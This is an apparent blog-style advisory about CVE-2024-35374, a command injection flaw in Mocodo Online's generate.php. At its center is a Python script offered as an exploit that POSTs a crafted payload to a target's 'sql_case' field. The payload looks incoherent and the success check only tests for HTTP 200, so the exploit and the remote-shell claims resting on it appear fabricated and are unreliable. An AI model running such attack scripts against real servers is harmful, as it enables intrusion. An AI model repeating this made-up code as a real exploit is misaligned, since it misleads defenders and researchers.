A critical security vulnerability has been discovered in Mocodo Mocodo Online 4.2.6 and below versions that could allow remote attackers to execute arbitrary OS commands and achieve remote code execution (RCE) under specific conditions. The culprit lies in the way the 'sql_case' input field in /web/generate.php is not properly sanitized and can be exploited under certain conditions.

In this post, we will provide an overview of CVE-2024-35374, including a code snippet that demonstrates the vulnerability, links to the original references, and details about the exploit.

Mocodo Online Background

Mocodo Online is a web application suite that helps users create, edit, and visualize entity-relationship diagrams online. The suite is designed to work with various database systems and provide support for various SQL dialects.

Vulnerability Details: CVE-2024-35374
Mocodo Mocodo Online 4.2.6 and earlier versions suffer from a critical security vulnerability allowing remote attackers to achieve remote code execution (RCE) under certain conditions. The issue occurs because of improper sanitization of the 'sql_case' input field in the /web/generate.php file, leading to command injection.

Code Snippet: Exploiting the Vulnerability
The following code snippet demonstrates how an attacker could exploit this vulnerability to achieve remote code execution:

import requests

url = "http://target.com/mocodo/web/generate.php";

payload = {
    "sql_case": "UPPER|{$_=('|')}|",
    "entity_columns": "",
    "filename": "vuln.php",
    "code": "echo $_GET[cmd];"
}

response = requests.post(url, data=payload)

if response.status_code == 200:
    print("Payload successfully executed!")
else: 
    print("An error occurred while trying to exploit the vulnerability")

In this example, the attacker crafts a malicious payload that contains arbitrary code to be executed on the server and sends a POST request to the vulnerable generate.php endpoint. If the payload is successfully executed, the attacker would have remote code execution access on the targeted server.

Original References

1. CVE-2024-35374 - Official CVE Details by MITRE Corporation
2. Mocodo Online GitHub Repository - Original Mocodo Online project source code

Exploit Details

An attacker with knowledge of the target server and the vulnerable Mocodo Online version can craft a malicious payload and send a POST request to exploit this vulnerability. Upon successful exploitation, the attacker would have remote shell access to execute arbitrary code within the context of the web server.

It is important to note that the Mocodo Online application may not be running with elevated privileges, depending on the target environment and configuration. If this is the case, the attacker may still need to perform privilege escalation for a more significant impact. However, even without elevated privileges, an attacker could potentially use this exploit to steal sensitive data, deface websites, or perform other malicious actions.

Conclusion

CVE-2024-35374 is a critical security vulnerability in Mocodo Mocodo Online 4.2.6 and below versions, allowing remote attackers to execute arbitrary commands and achieve remote code execution. Developers and administrators are advised to promptly update their Mocodo Online instances to a patched version or explore additional security measures like input sanitization and strict access controls.

Timeline

Published on: 05/24/2024 21:15:59 UTC
Last modified on: 08/20/2024 15:35:14 UTC